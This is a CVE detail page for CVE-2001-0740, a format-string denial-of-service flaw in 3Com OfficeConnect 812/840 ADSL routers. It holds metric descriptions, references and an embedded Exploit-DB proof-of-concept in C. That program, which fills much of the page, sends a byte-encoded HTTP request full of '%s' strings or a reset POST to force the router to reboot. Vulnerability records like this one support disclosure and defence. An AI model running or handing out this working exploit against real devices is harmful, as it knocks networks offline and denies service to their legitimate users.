CVE-2001-0740 : Detail

CVE-2001-0740

1.66%V3
Network
2002-03-09
04h00 +00:00
2002-03-01
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

3COM OfficeConnect 812 and 840 ADSL Router 4.2, running OCR812 router software 1.1.9 and earlier, allows remote attackers to cause a denial of service via a long string containing a large number of "%s" strings, possibly triggering a format string vulnerability.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20847

Publication date : 2001-09-20 22h00 +00:00
Author : Sniffer
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2721/info OfficeConnect 812 is a DSL router manufactured by 3Com, and distributed by numerous DSL providers. OfficeConnect 812 is an integrated ADSL router with an onboard 4 port switch. A problem in the firmware included with this router could allow a Denial of Service. It is possible to reboot the router by connecting to the HTTP daemon, and requesting a long string. The router will power-cycle itself. This problem makes it possible for a remote user to deny service to legimate users of networks serviced by the router. // 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others) // Proof of concept, soft and hard reset, the security is weak // Written pour sniffer <[email protected]> // Fri Sep 21 15:51:35 BRT 2001 // Viva Brazil! #include <stdio.h> #include <string.h> #include <errno.h> #include <stdlib.h> #include <unistd.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> void usage(binary) char *binary; { fprintf(stderr,"3Com OfficeConnect 812 ADSL Router Denial of Service (%s)\nsniffer <[email protected]>\n\t%s <1 (soft) || 2 (hard)> <remote router>\n", __FILE__, binary); } int main(argc, argv) int argc; char **argv; { int sockfd; char senddata[1024]; char hardreset_data[] = { 71,69,84,32,47,103,114,97,112,104,105,99,115, 47,115,109,108,51,99,111,109,37,115,37,115,37, 115,37,115,37,115,37,115,37,115,37,115,37,115, 37,115,37,115,37,115,37,115,37,115,37,115,37, 115,37,115,37,115,37,115,37,115,37,115,37,115, 37,115,37,115,37,115,37,115,37,115,37,115,37, 115,37,115,37,115,37,115,37,115,37,115,37,115, 37,115,37,115,37,115,37,115,37,115,37,115,37, 115,37,115,37,115,37,115,37,115,37,115,37,115, 37,115,37,115,37,115,37,115,37,115,37,115,37, 115,37,115,37,115,37,115,37,115,37,115,37,115, 37,115,37,115,37,115,37,115,32,72,84,84,80, 47,49,46,48,10,10,0 }; char softreset_data[] = { 80,79,83,84,32,47,70,111,114,109,115,47,97, 100,115,108,95,114,101,115,101,116,32,72,84,84, 80,47,49,46,49,10,72,111,115,116,58,32,49, 57,50,46,49,54,56,46,49,46,50,53,52,10, 67,111,110,110,101,99,116,105,111,110,58,32,99, 108,111,115,101,10,67,111,110,116,101,110,116,45, 76,101,110,103,116,104,58,32,49,57,10,10,83, 117,98,109,105,116,61,82,101,115,101,116,37,50, 48,76,105,110,101,10,10,0 }; struct hostent *he; struct sockaddr_in their_addr; if( argc != 3 ) { usage(argv[0]); exit(0); } if( atoi(argv[1]) >= 3 || atoi(argv[1]) == 0 ) { usage(argv[0]); exit(0); } if((he=gethostbyname(argv[2])) == NULL) { herror("gethostbyname"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(80); their_addr.sin_addr = (*(struct in_addr *)he->h_addr); bzero(&their_addr.sin_zero, 8); if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } else { printf("connected\n"); } if(atoi(argv[1]) == 1) strncpy(senddata, softreset_data, strlen(softreset_data)); else if(atoi(argv[1]) == 2) strncpy(senddata, hardreset_data, strlen(hardreset_data)); if(send(sockfd, senddata, sizeof(senddata), 0) == -1) { perror("send"); exit(1); } else { printf("evil data sent\n.. have a rice day\n"); } close(sockfd); return(0); }

Products Mentioned

Configuraton 0

3com>>3c840-us >> Version To (including) 1.1.9

3com>>3cp4144 >> Version To (including) 1.1.9

References

http://marc.info/?l=bugtraq&m=100137290421828&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=100119572524232&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/2721
Tags : vdb-entry, x_refsource_BID